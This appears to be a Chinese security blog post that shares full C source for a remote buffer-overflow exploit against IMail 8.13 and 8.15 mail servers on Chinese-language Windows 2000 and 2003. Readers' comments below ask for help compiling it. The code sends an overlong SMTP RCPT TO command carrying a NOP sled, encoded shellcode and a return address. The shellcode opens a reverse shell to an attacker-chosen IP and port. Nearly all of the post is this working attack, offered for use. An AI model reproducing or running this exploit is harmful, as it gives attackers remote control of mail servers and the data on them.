Imail 8.13-8.15 的EXP (win2000 and win2k3 chinese version)

鬼仔:前段时间发过 IMail 2006 and 8.x的Exp ,但是那个是针对英文版的,当时就有朋友说“有中文版的就好了”,这次,就发一个中文版的:Test imail8.13,8.15 on win2000 and win2k3 chinese version.

来源:心路

写这个的时候,懒了一下,没有动态生成shellcode,而是直接使用了一个固定的key来编码,所以某些监听IP和端口会有问题,包含特殊字符,不过程序做了判断,直接不运行。—_—!
代码:

/*******************************************************************************
* Test imail8.13,8.15 on win2000 and win2k3 chinese version.
* code by 云舒,ph4nt0m.org,2006,11
* dou you know who is icy? ^_^
*******************************************************************************/

#include <stdio.h>
#include <winsock2.h>

#pragma comment( lib, "ws2_32" )

#define HELO "EHLO\r\n"
#define FROM "MAIL FROM <[email protected]>\r\n"

/*对shellcode进行编码解码*/
unsigned char shellcode[] =
/* decode */
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
/* decode key */
"\xbd\xd7\x50\x90"
"\x83\xeb\xfc\xe2\xf4"

/* shellcode */
"\x41\xbd\xbb\xdd\x55\x2e\xaf\x6f"
"\x42\xb7\xdb\xfc\x99\xf3\xdb\xd5\x81\x5c\x2c\x95\xc5\xd6\xbf\x1b"
"\xf2\xcf\xdb\xcf\x9d\xd6\xbb\xd9\x36\xe3\xdb\x91\x53\xe6\x90\x09"
"\x11\x53\x90\xe4\xba\x16\x9a\x9d\xbc\x15\xbb\x64\x86\x83\x74\xb8"
"\xc8\x32\xdb\xcf\x99\xd6\xbb\xf6\x36\xdb\x1b\x1b\xe2\xcb\x51\x7b"
"\xbe\xfb\xdb\x19\xd1\xf3\x4c\xf1\x7e\xe6\x8b\xf4\x36\x94\x60\x1b"
"\xfd\xdb\xdb\xe0\xa1\x7a\xdb\xd0\xb5\x89\x38\x1e\xf3\xd9\xbc\xc0"
"\x42\x01\x36\xc3\xdb\xbf\x63\xa2\xd5\xa0\x23\xa2\xe2\x83\xaf\x40"
"\xd5\x1c\xbd\x6c\x86\x87\xaf\x46\xe2\x5e\xb5\xf6\x3c\x3a\x58\x92"
"\xe8\xbd\x52\x6f\x6d\xbf\x89\x99\x48\x7a\x07\x6f\x6b\x84\x03\xc3"
"\xee\x94\x03\xd3\xee\x28\x80\xf8\x7d\x17\x90\x50\xdb\xbf\x77\x9f"
"\xdb\x84\xd9\x71\x28\xbf\xbc\x69\x17\xb7\x07\x6f\x6b\xbd\x40\xc1"
"\xe8\x28\x80\xf6\xd7\xb3\x36\xf8\xde\xba\x3a\xc0\xe4\xfe\x9c\x19"
"\x5a\xbd\x14\x19\x5f\xe6\x90\x63\x17\x42\xd9\x6d\x43\x95\x7d\x6e"
"\xff\xfb\xdd\xea\x85\x7c\xfb\x3b\xd5\xa5\xae\x23\xab\x28\x25\xb8"
"\x42\x01\x0b\xc7\xef\x86\x01\xc1\xd7\xd6\x01\xc1\xe8\x86\xaf\x40"
"\xd5\x7a\x89\x95\x73\x84\xaf\x46\xd7\x28\xaf\xa7\x42\x07\x38\x77"
"\xc4\x11\x29\x6f\xc8\xd3\xaf\x46\x42\xa0\xac\x6f\x6d\xbf\xa0\x1a"
"\xb9\x88\x03\x6f\x6b\x28\x80\x90";

void Usage( char *name )
{
printf( "\nCode by 云舒(ph4nt0m.org),thx luoluo(ph4nt0m.org)!\n" );
printf( "Test imail8.13,8.15 on win2000 and win2k3 chinese version.\n" );
printf( "Dou you know who is icy? ^_^\n" );
printf( "\nUsage: %s <target_ip> <target_port> <cb_ip> <cb_port>\n", name );
}

int main( int argc, char *argv[] )
{
if( argc != 5 )
{
Usage( argv[0] );
return -1;
}

unsigned int cb_ip = inet_addr(argv[3]);

/* encode input ip by encode key */
cb_ip ^= 0x9050d7bd;

/* offset of ip is 0xb8 */
memcpy( (void *)(shellcode+0xb8), &cb_ip, 4 );

unsigned short cb_port = htons( atoi(argv[4]) );

/* encode input port by encode key */
cb_port ^= 0x9050;

/* offset of port is 0xbe */
memcpy( (void *)(shellcode + 0xbe), &cb_port, 2 );

/* 判断IP和port异或之后是否有特殊字符 */
unsigned char error_char[6] = { 0x00,0x0D,0x0A,0x20,0x3e,0x22 };
unsigned char sz_ip[4] = { 0 };
unsigned char sz_port[2] = { 0 };

memcpy(sz_ip, (void *)&cb_ip, 4);
memcpy(sz_port, (void *)&cb_port, 2);

for( int index = 0; index < 6; index ++ )
{
for (int j = 0; j < sizeof(sz_ip); j ++)
{
if (sz_ip[j] == error_char[index])
{
printf( "rpwt,haha,please change to another ip adress!\n" );
return -1;
}
}
for (int j = 0; j < sizeof(sz_port); j ++)
{
if (sz_port[j] == error_char[index])
{
printf( "rpwt,haha,please change to another port\n");
return -1;
}
}
}

WSAData wsa;
SOCKET sock;
struct sockaddr_in sin;
int ret;

ret = WSAStartup( 0x0202, &wsa );
if( ret != 0 )
{
printf( "WSAStartup error: %d\n", GetLastError() );
return -1;
}

sock = socket( AF_INET, SOCK_STREAM, 0 );
if( sock == INVALID_SOCKET )
{
printf( "Create socket error: %d\n", GetLastError() );

WSACleanup( );
return -1;
}

memset( &sin, 0, sizeof(struct sockaddr_in) );
sin.sin_addr.S_un.S_addr = inet_addr( argv[1] );
sin.sin_family = AF_INET;
sin.sin_port = htons( atoi(argv[2]) );

ret = connect( sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in) );
if( ret == SOCKET_ERROR )
{
printf( "Connect error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "Connect ok!\n" );

char recv_buf[512] = { 0 };

/* get banner */
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s\n", recv_buf );

/* send hello */
ret = send( sock, HELO, strlen(HELO), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}

/* recv */
memset( recv_buf, 0, 512 );
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s\n", recv_buf );

/* send from */
ret = send( sock, FROM, strlen(FROM), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}

/* recv */
memset( recv_buf, 0, 512 );
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s\n", recv_buf );

char send_buf[1024] = { 0 };
char *ret_addr = "\xe1\x1e\xfa\x7f";

/* | 548 | */
/* RCPT TO <@:|x90.....shellcode|ret| */
strcat( send_buf, "RCPT TO <@:" );
for( int index = 1; index <= 548 - strlen((char *)shellcode); index ++ )
{
strcat( send_buf, "\x90" );
}
strcat( send_buf, (char *)shellcode );
strcat( send_buf, ret_addr );
strcat( send_buf, ">\r\n\r\n" );

/* send shellcode */
ret = send( sock, send_buf, strlen(send_buf), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d\n", GetLastError() );

closesocket( sock );
WSACleanup( );
return -1;
}
printf( "Send exploit %d bytes,check your listing port,good luck!\n", ret );

closesocket( sock );
WSACleanup( );
return 0;
}

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

  • 鬼仔

    自己编译下吧
    不会才更要学习啊

  • 关注中

    老兄,帮编译一下啊,俺不会编译,谢谢啊。 :lol:

  • 关注中

    $ gcc -o imail8.15.exe imail.c
    imail.c: In function `main':
    imail.c:61: parse error before `unsigned'
    imail.c:64: `cb_ip' undeclared (first use in this function)
    imail.c:64: (Each undeclared identifier is reported only once
    imail.c:209: parse error before string constant
    imail.c:209: conflicting types for `strcat'
    还有一大堆,
    怎么会这样啊?

  • pesoft

    VC F7
    GCC gcc -O2 -o iMailExp.exe iMailExp.c

发表评论